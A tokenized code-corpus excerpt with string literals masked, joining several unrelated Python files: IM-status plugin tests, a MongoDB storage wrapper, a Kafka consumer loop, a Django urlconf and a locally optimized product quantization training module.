Film ( structure ) <EOL> film . get_structure ( ) <EOL> print ( '<STR_LIT>' , film . film_structure ) <EOL> for item in film . layers : <EOL> print ( item . composition , item . thickness , item . density , item . roughness , item . tag ) <EOL> def testall ( ) : <EOL> test ( '<STR_LIT>' ) <EOL> test ( '<STR_LIT>' ) <EOL> test ( '<STR_LIT>' ) <EOL> test ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> testall ( ) </s>
<s> """<STR_LIT>""" <EOL> from focus import common <EOL> from focus . parser . lexer import SettingLexer <EOL> from focus . parser . parser import SettingParser , ParseError <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def parse_config ( filename , header ) : <EOL> """<STR_LIT>""" <EOL> parser = SettingParser ( filename ) <EOL> if parser . header != header : <EOL> header_value = parser . header or '<STR_LIT>' <EOL> raise ParseError ( u"<STR_LIT>" <EOL> . format ( common . from_utf8 ( header_value ) , header ) ) <EOL> return parser </s>
<s> from focus . plugin . modules import im as plugins <EOL> from focus_unittest import ( <EOL> FocusTestCase , IS_MACOSX , skipUnless , skipIf <EOL> ) <EOL> class IMStatusCase ( FocusTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( IMStatusCase , self ) . setUp ( ) <EOL> self . plugin = plugins . IMStatus ( ) <EOL> def tearDown ( self ) : <EOL> self . plugin = None <EOL> super ( IMStatusCase , self ) . tearDown ( ) <EOL> def testValidStatusType__parse_option ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . plugin . statuses , { } ) <EOL> for status in self . plugin . VALID_STATUSES : <EOL> for key in ( '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . plugin . parse_option ( key , '<STR_LIT>' , <EOL> status , '<STR_LIT>' ) <EOL> if key == '<STR_LIT:status>' : <EOL> key = '<STR_LIT>' + key <EOL> key = key . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . assertIn ( key , self . plugin . statuses ) <EOL> self . assertEqual ( self . plugin . statuses [ key ] , ( status , '<STR_LIT>' ) ) <EOL> def testValidStatusMsg__parse_option ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . plugin . messages , { } ) <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> value = '<STR_LIT>' <EOL> self . plugin . parse_option ( '<STR_LIT>' , '<STR_LIT>' , <EOL> key , value ) <EOL> self . assertIn ( key , self . plugin . messages ) <EOL> self . assertEqual ( self . plugin . messages [ key ] , value ) <EOL> def testInvalidStatusType__parse_option ( self ) : <EOL> """<STR_LIT>""" <EOL> for key in ( '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . plugin . parse_option ( key , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:2>' , '<STR_LIT:3>' , '<STR_LIT:4>' ) <EOL> with self . assertRaises ( ValueError ) : <EOL> self . plugin . parse_option ( key , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def testInvalidStatusMsg__parse_option ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( TypeError ) : <EOL> self . plugin . parse_option ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:name>' , '<STR_LIT:value>' , '<STR_LIT:2>' , '<STR_LIT:3>' ) <EOL> @ skipUnless ( IS_MACOSX , '<STR_LIT>' ) <EOL> def testMac___set_status ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEquals ( self . plugin . set_status_funcs , ( <EOL> plugins . _adium_status , plugins . _osx_skype_status <EOL> ) ) <EOL> @ skipIf ( IS_MACOSX , '<STR_LIT>' ) <EOL> def testRegular___set_status ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEquals ( self . plugin . set_status_funcs , ( <EOL> plugins . _pidgin_status , plugins . _empathy_status , <EOL> plugins . _linux_skype_status <EOL> ) ) <EOL> def testCallStatusFuncs___set_status ( self ) : <EOL> """<STR_LIT>""" <EOL> ret_items = [ ] <EOL> def _check_func ( status , message ) : <EOL> ret_items . append ( ( status , message ) ) <EOL> self . plugin . set_status_funcs = ( _check_func , _check_func ) <EOL> self . plugin . _set_status ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for item in ret_items : <EOL> self . assertEqual ( item , ( '<STR_LIT>' , '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> from pymongo import MongoClient <EOL> import logging <EOL> import base <EOL> import constants as cons <EOL> from bson . objectid import ObjectId <EOL> from uid import UID <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class MongoClientPool ( object ) : <EOL> def __init__ ( self ) : <EOL> self . __clients = { } <EOL> def getDataBase ( self , connectionString , databaseName ) : <EOL> key = ( connectionString , databaseName ) <EOL> if key in self . __clients : <EOL> return self . __clients [ key ] [ databaseName ] <EOL> else : <EOL> try : <EOL> client = MongoClient ( connectionString , connectTimeoutMS = <NUM_LIT> ) <EOL> self . __clients [ key ] = client <EOL> return client [ databaseName ] <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( databaseName , connectionString ) ) <EOL> return None <EOL> def getClient ( self , connectionString ) : <EOL> if connectionString in self . __clients : <EOL> return self . __clients [ connectionString ] <EOL> else : <EOL> try : <EOL> client = MongoClient ( connectionString , connectTimeoutMS = <NUM_LIT> ) <EOL> self . __clients [ connectionString ] = client <EOL> return client <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( connectionString ) ) <EOL> return None <EOL> def exists ( self ) : <EOL> [ client . close ( ) for client in self . __clients . values ( ) ] <EOL> class Crane ( object ) : <EOL> mongoClientPool = MongoClientPool ( ) <EOL> def __init__ ( self , connectionString = None , database = None , collectionName = None ) : <EOL> if connectionString is None or database is None or collectionName is None : <EOL> return <EOL> logger . info ( '<STR_LIT>' . format ( collectionName ) ) <EOL> self . _defaultCollectionName = collectionName <EOL> self . _currentCollectionName = collectionName <EOL> self . _database = self . mongoClientPool . getDataBase ( connectionString , database ) <EOL> self . _coll = self . _database [ collectionName ] <EOL> self . _cache = { } <EOL> def __get_one ( self , key ) : <EOL> if key in self . _cache : <EOL> return self . _cache [ key ] <EOL> else : <EOL> return None <EOL> def __get_all ( self , keys ) : <EOL> objs = [ self . _cache [ key ] for key in keys if key in self . _cache ] <EOL> rems = [ key for key in keys if key not in self . _cache ] <EOL> return objs , rems <EOL> def __put_one ( self , obj ) : <EOL> self . _cache [ obj . _id ] = obj <EOL> def __put_all ( self , objs ) : <EOL> map ( self . __put_one , objs ) <EOL> def __erase_one ( self , obj ) : <EOL> try : <EOL> del self . _cache [ obj . _id ] <EOL> except : <EOL> pass <EOL> def __erase_all ( self , objs ) : <EOL> map ( self . __erase_one , objs ) <EOL> def _reload ( self ) : <EOL> for key in self . _cache : <EOL> self . _cache [ key ] = base . monkFactory . decode ( self . _cache [ key ] . generic ( ) ) <EOL> def set_collection_name ( self , collectionName ) : <EOL> if collectionName : <EOL> self . _coll = self . _database [ collectionName ] <EOL> self . _currentCollectionName = collectionName <EOL> def reset_collection_name ( self ) : <EOL> self . _coll = self . _database [ self . _defaultCollectionName ] <EOL> self . _currentCollectionName = self . _defaultCollectionName <EOL> def convert_to_MONKObject ( self , monkType ) : <EOL> objs = self . _coll . find ( ) <EOL> rets = [ ] <EOL> for obj in objs : <EOL> obj [ '<STR_LIT>' ] = monkType <EOL> obj = self . create_one ( obj ) <EOL> rets . append ( obj ) <EOL> self . save_all ( rets ) <EOL> return rets <EOL> def delete_by_id ( self , obj ) : <EOL> if not obj : <EOL> return False <EOL> if not isinstance ( obj , ObjectId ) : <EOL> return False <EOL> self . _coll . remove ( obj ) <EOL> self . __erase_one ( obj ) <EOL> return True <EOL> def load_or_create ( self , obj , tosave = False ) : <EOL> if obj is None : <EOL> return None <EOL> if isinstance ( obj , ObjectId ) : <EOL> return self . load_one_by_id ( obj ) <EOL> else : <EOL> objId = self . load_one_in_id ( { '<STR_LIT:name>' : obj . get ( '<STR_LIT:name>' , cons . DEFAULT_EMPTY ) , <EOL> '<STR_LIT>' : obj . get ( '<STR_LIT>' , cons . DEFAULT_CREATOR ) } ) <EOL> if objId : <EOL> return self . load_one_by_id ( objId [ '<STR_LIT>' ] ) <EOL> elif '<STR_LIT>' in obj : <EOL> obj = self . create_one ( obj ) <EOL> if tosave : <EOL> obj . save ( ) <EOL> return obj <EOL> else : <EOL> return None <EOL> def load_or_create_all ( self , objs , tosave = False ) : <EOL> if not objs : <EOL> return [ ] <EOL> if isinstance ( objs [ <NUM_LIT:0> ] , ObjectId ) : <EOL> return self . load_all_by_ids ( objs ) <EOL> else : <EOL> return [ self . load_or_create ( obj , tosave ) for obj in objs ] <EOL> def exists_field ( self , obj , field ) : <EOL> query = { '<STR_LIT>' : obj . _id , field : { '<STR_LIT>' : True } } <EOL> if self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def exists_fields ( self , obj , fields ) : <EOL> query = { field : { '<STR_LIT>' : True } for field in fields } <EOL> query [ '<STR_LIT>' ] = obj . _id <EOL> if self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def remove_field ( self , obj , field ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : { field : <NUM_LIT:1> } } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( field , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def remove_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( '<STR_LIT>' . join ( fields ) , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def push_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return False <EOL> return True <EOL> def pull_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( fields , obj . _id ) ) <EOL> return False <EOL> return True <EOL> def update_in_fields ( self , query , fields ) : <EOL> obj = self . load_one_in_id ( query ) <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj [ '<STR_LIT>' ] } , { '<STR_LIT>' : fields } , upsert = True ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj , fields ) ) <EOL> return False <EOL> return True <EOL> def update_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> self . _coll . update ( { '<STR_LIT>' : obj . _id } , { '<STR_LIT>' : fields } , upsert = True ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return False <EOL> return True <EOL> def load_one_in_fields ( self , obj , fields ) : <EOL> try : <EOL> return self . _coll . find_one ( { '<STR_LIT>' : obj . _id } , fields ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( obj . _id , fields ) ) <EOL> return None <EOL> def save_one ( self , obj ) : <EOL> self . update_one_in_fields ( obj , obj . generic ( ) ) <EOL> def save_all ( self , objs ) : <EOL> [ self . update_one_in_fields ( obj , obj . generic ( ) ) for obj in objs ] <EOL> def create_one ( self , obj ) : <EOL> obj = base . monkFactory . decode ( obj ) <EOL> if obj : <EOL> self . __put_one ( obj ) <EOL> return obj <EOL> def create_all ( self , objs ) : <EOL> objs = map ( base . monkFactory . decode , objs ) <EOL> self . __put_all ( objs ) <EOL> return objs <EOL> def load_one_by_id ( self , objId ) : <EOL> obj = self . __get_one ( objId ) <EOL> if not obj and objId : <EOL> try : <EOL> obj = self . _coll . find_one ( { '<STR_LIT>' : objId } ) <EOL> obj = base . monkFactory . decode ( obj ) <EOL> if obj : <EOL> self . __put_one ( obj ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( objId ) ) <EOL> obj = None <EOL> return obj <EOL> def load_all_by_ids ( self , objIds ) : <EOL> objs , rems = self . __get_all ( objIds ) <EOL> if rems : <EOL> try : <EOL> remainObjs = map ( base . monkFactory . decode , <EOL> self . _coll . find ( { '<STR_LIT>' : { '<STR_LIT>' : rems } } ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( rems [ <NUM_LIT:0> ] ) ) <EOL> remainObjs = [ ] <EOL> objs . extend ( remainObjs ) <EOL> self . __put_all ( remainObjs ) <EOL> return objs <EOL> def load_one_in_id ( self , query ) : <EOL> try : <EOL> return self . _coll . find_one ( query , { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def load_all_in_ids ( self , query , skip = <NUM_LIT:0> , num = <NUM_LIT:0> ) : <EOL> try : <EOL> return list ( self . _coll . find ( query , { '<STR_LIT>' : <NUM_LIT:1> } , skip = skip , limit = num ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return [ ] <EOL> def load_one ( self , query , fields ) : <EOL> try : <EOL> return self . _coll . find_one ( query , fields ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def load_all ( self , query , fields , skip = <NUM_LIT:0> , num = <NUM_LIT:0> ) : <EOL> try : <EOL> return list ( self . _coll . find ( query , fields , skip = skip , limit = num ) ) <EOL> except Exception as e : <EOL> logger . warning ( e . message ) <EOL> logger . warning ( '<STR_LIT>' . format ( query ) ) <EOL> return None <EOL> def has_name_user ( self , name , user ) : <EOL> if self . _coll . find_one ( { '<STR_LIT:name>' : name , '<STR_LIT>' : user } ) : <EOL> return True <EOL> else : <EOL> return False <EOL> uidStore = UID ( ) <EOL> userStore = Crane ( ) <EOL> entityStore = Crane ( ) <EOL> pandaStore = Crane ( ) <EOL> mantisStore = Crane ( ) <EOL> turtleStore = Crane ( ) <EOL> tigressStore = Crane ( ) <EOL> workerStore = Crane ( ) <EOL> engineStore = Crane ( ) <EOL> def exit_storage ( ) : <EOL> Crane . mongoClientPool . exists ( ) <EOL> def initialize_storage ( config ) : <EOL> global uidStore , entityStore , pandaStore <EOL> global mantisStore , turtleStore , tigressStore <EOL> global userStore , engineStore <EOL> uidStore = UID ( config . uidConnectionString , <EOL> config . uidDataBaseName ) <EOL> entityStore = Crane ( config . dataConnectionString , <EOL> config . dataDataBaseName , <EOL> config . entityCollectionName ) <EOL> userStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . userCollectionName ) <EOL> engineStore = Crane ( config . sysConnectionString , <EOL> config . sysDataBaseName , <EOL> config . engineCollectionName ) <EOL> pandaStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . pandaCollectionName ) <EOL> mantisStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . mantisCollectionName ) <EOL> turtleStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . turtleCollectionName ) <EOL> tigressStore = Crane ( config . modelConnectionString , <EOL> config . modelDataBaseName , <EOL> config . tigressCollectionName ) <EOL> from panda import Panda <EOL> Panda . store = pandaStore <EOL> from mantis import Mantis <EOL> Mantis . store = mantisStore <EOL> from turtle import Turtle <EOL> Turtle . store = turtleStore <EOL> from tigress import Tigress <EOL> Tigress . store = tigressStore <EOL> from user import User <EOL> User . store = userStore <EOL> from engine import Engine <EOL> Engine . store = engineStore <EOL> return True <EOL> def reload_storage ( ) : <EOL> userStore . _reload ( ) <EOL> engineStore . _reload ( ) <EOL> mantisStore . _reload ( ) <EOL> pandaStore . _reload ( ) <EOL> tigressStore . _reload ( ) <EOL> turtleStore . _reload ( ) <EOL> entityStore . _reload ( ) </s>
<s> """<STR_LIT>""" <EOL> from kafka . client import KafkaClient <EOL> from kafka . consumer import SimpleConsumer <EOL> import os <EOL> import platform <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> import win32api <EOL> else : <EOL> import signal <EOL> import thread <EOL> import traceback <EOL> kafkaHost = '<STR_LIT>' <EOL> kafkaTopic = '<STR_LIT>' <EOL> kafkaGroup = '<STR_LIT>' <EOL> kafka = None <EOL> producer = None <EOL> consumer = None <EOL> def onexit ( ) : <EOL> global kafka , consumer , producer <EOL> if consumer : <EOL> consumer . commit ( ) <EOL> consumer . stop ( ) <EOL> consumer = None <EOL> if producer : <EOL> producer . stop ( ) <EOL> producer = None <EOL> if kafka : <EOL> kafka . close ( ) <EOL> kafka = None <EOL> print ( '<STR_LIT>' . format ( os . getpid ( ) ) ) <EOL> def handler ( sig , hook = thread . interrupt_main ) : <EOL> global kafka , consumer , producer <EOL> if consumer : <EOL> consumer . commit ( ) <EOL> consumer . stop ( ) <EOL> consumer = None <EOL> if producer : <EOL> producer . stop ( ) <EOL> producer = None <EOL> if kafka : <EOL> kafka . close ( ) <EOL> kafka = None <EOL> print ( '<STR_LIT>' . format ( os . getpid ( ) ) ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def server ( ) : <EOL> global kafka , producer , consumer <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> win32api . SetConsoleCtrlHandler ( handler , <NUM_LIT:1> ) <EOL> else : <EOL> signal . signal ( signal . SIGINT , onexit ) <EOL> try : <EOL> kafka = KafkaClient ( kafkaHost , timeout = None ) <EOL> consumer = SimpleConsumer ( kafka , kafkaGroup , kafkaTopic , partitions = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> for message in consumer : <EOL> print ( message ) <EOL> except Exception as e : <EOL> print ( '<STR_LIT>' . format ( e ) ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( traceback . format_exc ( ) ) <EOL> except KeyboardInterrupt : <EOL> onexit ( ) <EOL> finally : <EOL> onexit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> while <NUM_LIT:1> : <EOL> server ( ) </s>
<s> class PayPalFailure ( Exception ) : pass </s>
<s> from django . conf . urls import patterns <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> import numpy as np <EOL> from sklearn . cluster import KMeans <EOL> import logging <EOL> import sys <EOL> from collections import namedtuple <EOL> from . utils import iterate_splits , predict_cluster <EOL> logger = logging . getLogger ( __name__ ) <EOL> logger . setLevel ( logging . WARNING ) <EOL> logger . addHandler ( logging . StreamHandler ( sys . stdout ) ) <EOL> def eigenvalue_allocation ( num_buckets , eigenvalues ) : <EOL> """<STR_LIT>""" <EOL> D = len ( eigenvalues ) <EOL> dims_per_bucket = D / num_buckets <EOL> eigenvalue_product = np . zeros ( num_buckets , dtype = float ) <EOL> bucket_size = np . zeros ( num_buckets , dtype = int ) <EOL> permutation = np . zeros ( ( num_buckets , dims_per_bucket ) , dtype = int ) <EOL> min_non_zero_eigenvalue = np . min ( np . abs ( eigenvalues [ np . nonzero ( eigenvalues ) ] ) ) <EOL> eigenvalues = eigenvalues / min_non_zero_eigenvalue <EOL> sorted_inds = np . argsort ( eigenvalues ) [ : : - <NUM_LIT:1> ] <EOL> log_eigs = np . log2 ( abs ( eigenvalues ) ) <EOL> for ind in sorted_inds : <EOL> eligible = ( bucket_size < dims_per_bucket ) . nonzero ( ) <EOL> i = eigenvalue_product [ eligible ] . argmin ( <NUM_LIT:0> ) <EOL> bucket = eligible [ <NUM_LIT:0> ] [ i ] <EOL> eigenvalue_product [ bucket ] = eigenvalue_product [ bucket ] + log_eigs [ ind ] <EOL> permutation [ bucket , bucket_size [ bucket ] ] = ind <EOL> bucket_size [ bucket ] += <NUM_LIT:1> <EOL> return np . reshape ( permutation , D ) <EOL> def compute_local_rotations ( data , C , num_buckets ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> A , mu , count , assignments , residuals = accumulate_covariance_estimators ( data , C ) <EOL> R , mu = compute_rotations_from_accumulators ( A , mu , count , num_buckets ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return R , mu , assignments , residuals <EOL> def accumulate_covariance_estimators ( data , C ) : <EOL> """<STR_LIT>""" <EOL> V = C . shape [ <NUM_LIT:0> ] <EOL> N = data . shape [ <NUM_LIT:0> ] <EOL> D = data . shape [ <NUM_LIT:1> ] <EOL> A = np . zeros ( ( V , D , D ) ) <EOL> mu = np . zeros ( ( V , D ) ) <EOL> count = np . zeros ( V , dtype = int ) <EOL> assignments = np . zeros ( N , dtype = int ) <EOL> residuals = np . zeros ( ( N , D ) ) <EOL> for i in xrange ( N ) : <EOL> d = data [ i ] <EOL> cluster = predict_cluster ( d , C ) <EOL> centroid = C [ cluster ] <EOL> residual = d - centroid <EOL> assignments [ i ] = cluster <EOL> mu [ cluster ] += residual <EOL> count [ cluster ] += <NUM_LIT:1> <EOL> A [ cluster ] += np . outer ( residual , residual ) <EOL> residuals [ i ] = residual <EOL> return A , mu , count , assignments , residuals <EOL> def compute_rotations_from_accumulators ( A , mu , count , num_buckets ) : <EOL> """<STR_LIT>""" <EOL> V , D = mu . shape <EOL> for i in xrange ( V ) : <EOL> num_points = count [ i ] <EOL> mu [ i ] /= num_points <EOL> cov = ( A [ i ] + A [ i ] . transpose ( ) ) / ( <NUM_LIT:2> * ( num_points - <NUM_LIT:1> ) ) - np . outer ( mu [ i ] , mu [ i ] ) <EOL> if num_points < D : <EOL> logger . warn ( '<STR_LIT>' % ( num_points , D , i ) ) <EOL> eigenvalues = np . ones ( D ) <EOL> A [ i ] = np . eye ( D ) <EOL> else : <EOL> eigenvalues , A [ i ] = np . linalg . eigh ( cov ) <EOL> permuted_inds = eigenvalue_allocation ( num_buckets , eigenvalues ) <EOL> A [ i ] = A [ i , : , permuted_inds ] <EOL> return A , mu <EOL> def project_residuals_to_local ( residuals , assignments , Rs , mu ) : <EOL> """<STR_LIT>""" <EOL> projected = np . zeros ( residuals . shape ) <EOL> for i in xrange ( residuals . shape [ <NUM_LIT:0> ] ) : <EOL> res = residuals [ i ] <EOL> a = assignments [ i ] <EOL> projected [ i ] = np . dot ( Rs [ a ] , res - mu [ a ] ) <EOL> return projected <EOL> def compute_residuals ( data , C ) : <EOL> assignments = np . apply_along_axis ( predict_cluster , <NUM_LIT:1> , data , C ) <EOL> residuals = data - C [ assignments ] <EOL> return residuals , assignments <EOL> def train_coarse ( data , V = <NUM_LIT:8> , kmeans_coarse_iters = <NUM_LIT:10> , n_init = <NUM_LIT:10> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> model = KMeans ( n_clusters = V , init = "<STR_LIT>" , max_iter = kmeans_coarse_iters , n_init = n_init , n_jobs = <NUM_LIT:1> , verbose = False , random_state = random_state ) <EOL> model . fit ( data ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return model . cluster_centers_ <EOL> def train_subquantizers ( data , num_buckets , subquantizer_clusters = <NUM_LIT> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , random_state = None ) : <EOL> """<STR_LIT>""" <EOL> subquantizers = list ( ) <EOL> for i , d in enumerate ( np . split ( data , num_buckets , axis = <NUM_LIT:1> ) ) : <EOL> model = KMeans ( n_clusters = subquantizer_clusters , init = "<STR_LIT>" , max_iter = kmeans_local_iters , <EOL> n_init = n_init , n_jobs = <NUM_LIT:1> , verbose = False , random_state = random_state ) <EOL> model . fit ( d ) <EOL> subquantizers . append ( model . cluster_centers_ ) <EOL> logger . info ( '<STR_LIT>' % ( i + <NUM_LIT:1> , num_buckets ) ) <EOL> return subquantizers <EOL> def train ( data , V = <NUM_LIT:8> , M = <NUM_LIT:4> , subquantizer_clusters = <NUM_LIT> , parameters = None , <EOL> kmeans_coarse_iters = <NUM_LIT:10> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , <EOL> subquantizer_sample_ratio = <NUM_LIT:1.0> , random_state = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if ( verbose ) : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> Cs = Rs = mus = subquantizers = None <EOL> if parameters is not None : <EOL> Cs , Rs , mus , subquantizers = parameters <EOL> if Rs is None or mus is None : <EOL> Rs = mus = None <EOL> first_half , second_half = np . split ( data , <NUM_LIT:2> , axis = <NUM_LIT:1> ) <EOL> if Cs is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> C1 , C2 = Cs <EOL> else : <EOL> C1 = train_coarse ( first_half , V , kmeans_coarse_iters , n_init , random_state ) <EOL> C2 = train_coarse ( second_half , V , kmeans_coarse_iters , n_init , random_state ) <EOL> if Rs is not None and mus is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> Rs1 , Rs2 = Rs <EOL> mu1 , mu2 = mus <EOL> assignments1 = assignments2 = residuals1 = residuals2 = None <EOL> else : <EOL> Rs1 , mu1 , assignments1 , residuals1 = compute_local_rotations ( first_half , C1 , M / <NUM_LIT:2> ) <EOL> Rs2 , mu2 , assignments2 , residuals2 = compute_local_rotations ( second_half , C2 , M / <NUM_LIT:2> ) <EOL> subquantizer_sample_ratio = min ( subquantizer_sample_ratio , <NUM_LIT:1.0> ) <EOL> N = data . shape [ <NUM_LIT:0> ] <EOL> N2 = int ( np . floor ( subquantizer_sample_ratio * N ) ) <EOL> sample_inds = np . random . RandomState ( random_state ) . choice ( N , N2 , False ) <EOL> logger . info ( '<STR_LIT>' % ( subquantizer_sample_ratio , N2 ) ) <EOL> if assignments1 is not None : <EOL> residuals1 = residuals1 [ sample_inds ] <EOL> residuals2 = residuals2 [ sample_inds ] <EOL> assignments1 = assignments1 [ sample_inds ] <EOL> assignments2 = assignments2 [ sample_inds ] <EOL> else : <EOL> residuals1 , assignments1 = compute_residuals ( first_half [ sample_inds ] , C1 ) <EOL> residuals2 , assignments2 = compute_residuals ( second_half [ sample_inds ] , C2 ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> projected1 = project_residuals_to_local ( residuals1 , assignments1 , Rs1 , mu1 ) <EOL> projected2 = project_residuals_to_local ( residuals2 , assignments2 , Rs2 , mu2 ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> subquantizers1 = train_subquantizers ( projected1 , M / <NUM_LIT:2> , subquantizer_clusters , kmeans_local_iters , n_init , random_state = random_state ) <EOL> subquantizers2 = train_subquantizers ( projected2 , M / <NUM_LIT:2> , subquantizer_clusters , kmeans_local_iters , n_init , random_state = random_state ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return ( C1 , C2 ) , ( Rs1 , Rs2 ) , ( mu1 , mu2 ) , ( subquantizers1 , subquantizers2 ) <EOL> LOPQCode = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class LOPQModel ( object ) : <EOL> def __init__ ( self , V = <NUM_LIT:8> , M = <NUM_LIT:4> , subquantizer_clusters = <NUM_LIT> , parameters = None ) : <EOL> """<STR_LIT>""" <EOL> self . Cs , self . Rs , self . mus , self . subquantizers = parameters if parameters is not None else ( None , None , None , None ) <EOL> if self . Cs is not None : <EOL> self . V = self . Cs [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> self . num_coarse_splits = len ( self . Cs ) <EOL> else : <EOL> self . V = V <EOL> self . num_coarse_splits = <NUM_LIT:2> <EOL> if self . subquantizers is not None : <EOL> self . num_fine_splits = len ( self . subquantizers [ <NUM_LIT:0> ] ) <EOL> self . M = self . num_fine_splits * self . num_coarse_splits <EOL> self . subquantizer_clusters = self . subquantizers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> self . num_fine_splits = M / <NUM_LIT:2> <EOL> self . M = M <EOL> self . subquantizer_clusters = subquantizer_clusters <EOL> def fit ( self , data , kmeans_coarse_iters = <NUM_LIT:10> , kmeans_local_iters = <NUM_LIT:20> , n_init = <NUM_LIT:10> , subquantizer_sample_ratio = <NUM_LIT:1.0> , random_state = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> existing_parameters = ( self . Cs , self . Rs , self . mus , self . subquantizers ) <EOL> parameters = train ( data , self . V , self . M , self . subquantizer_clusters , existing_parameters , <EOL> kmeans_coarse_iters , kmeans_local_iters , n_init , subquantizer_sample_ratio , <EOL> random_state , verbose ) <EOL> self . Cs , self . Rs , self . mus , self . subquantizers = parameters <EOL> def get_split_parameters ( self , split ) : <EOL> """<STR_LIT>""" <EOL> return self . Cs [ split ] if self . Cs is not None else None , self . Rs [ split ] if self . Rs is not None else None , self . mus [ split ] if self . mus is not None else None , self . subquantizers [ split ] if self . subquantizers is not None else None <EOL> def predict ( self , x ) : <EOL> """<STR_LIT>""" <EOL> coarse_codes = self . predict_coarse ( x ) <EOL> 